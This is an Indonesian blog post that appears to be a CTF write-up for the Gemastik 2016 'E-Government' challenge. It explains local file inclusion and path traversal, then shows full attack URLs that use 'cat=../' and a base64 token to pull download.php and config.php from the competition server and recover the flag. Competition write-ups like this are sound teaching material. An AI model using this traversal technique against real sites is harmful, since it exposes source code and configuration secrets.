Pages Menu
Categories Menu




Posted by on Aug 17, 2016 in Event, Hacking, Tutorial, Write-up | 0 comments

[Write-Up : E-Government] Gemastik 2016

[Write-Up : E-Government] Gemastik 2016

as

Pemerintah Kota Dunia Digital membuat web repository sebagai pusat unduh dokumen-dokumen publik milik pemerintah untuk menjaga transparansi.

Anda pun penasaran dengan keamanan dari web tersebut.

Alamat Web:
https://target.netsec.gemastik.ui.ac.id/4d87e482b4f7b56fcafa208a2889bdbe/e-government-repository/

as1

tidak ada yang mencurigakan dari isi file di web tersebut, sekarang kita coba sedikit bermain di url file,

url file :

https://target.netsec.gemastik.ui.ac.id/4d87e482b4f7b56fcafa208a2889bdbe/e-government-repository/download.php?file=Sosialisasi%20Penanganan%20Demam%20Berdarah%202016.pdf&token=U29zaWFsaXNhc2kgUGVuYW5nYW5hbiBEZW1hbSBCZXJkYXJhaCAyMDE2LnBkZg==&cat=Kesehatan

https://target.netsec.gemastik.ui.ac.id/4d87e482b4f7b56fcafa208a2889bdbe/e-government-repository/download.php?file={nama_file}&token={base64_dari_nama_file}&cat={direktori_File}

 

dilihat dari URL situs, besar kemungkinan ada bug LFI (Local file Inclusion), sebelumnya saya akan sedikit menjelaskan apa itu LFI,

Local File Inclusion (LFI) adalah kerentanan/vulnerability yang umum ditemukan pada aplikasi web. Kerentanan ini memungkinkan penyerang/attacker untuk menyertakan file lokal yang tersimpan di server agar dapat menjadi bagian dari proses eksekusi aplikasi.

Kerentanan Local File Inclusion (LFI) terjadi karena fungsi “include” pada aplikasi dapat dimanipulasi oleh pengguna/users melalui Input. Hal ini sebenarnya tidak akan menimbulkan permasalahan apabila input yang berasal dari pengguna dapat difilter atau disanitasi sebelum fungsi“include” memprosesnya.

File inclusion juga dapat terjadi pada fungsi aplikasi yang memproses file berdasarkan nama file yang diberikan oleh pengguna. Hal ini juga biasa disebut dengan kerentanan File path traversal. Input yang diberikan oleh pengguna bisa menggunakan link pada url atau melalui input box.

kita mencoba mendownload file download.php :

https://target.netsec.gemastik.ui.ac.id/4d87e482b4f7b56fcafa208a2889bdbe/e-government-repository/download.php?file=download.php&token=ZG93bmxvYWQucGhw&cat=../

e-gev

token = ZG93bmxvYWQucGhw adalah base64 dari download.php

surcecode download.php

e-gov

kita tidak mendapat flag di sourcecode download.php, sekarang coba kita cek di file config.php

url :

https://target.netsec.gemastik.ui.ac.id/4d87e482b4f7b56fcafa208a2889bdbe/e-government-repository/download.php?file=config.php&token=Y29uZmlnLnBocA==&cat=../

config

Flag : GEMASTIK{The_Panama_Papers_are_the_largest_data_leak_and_caused_by_LFI}

johan Wahyudi on Facebook
johan Wahyudi
Linux and Network Security Enthusiast

Post a Reply

Your email address will not be published. Required fields are marked *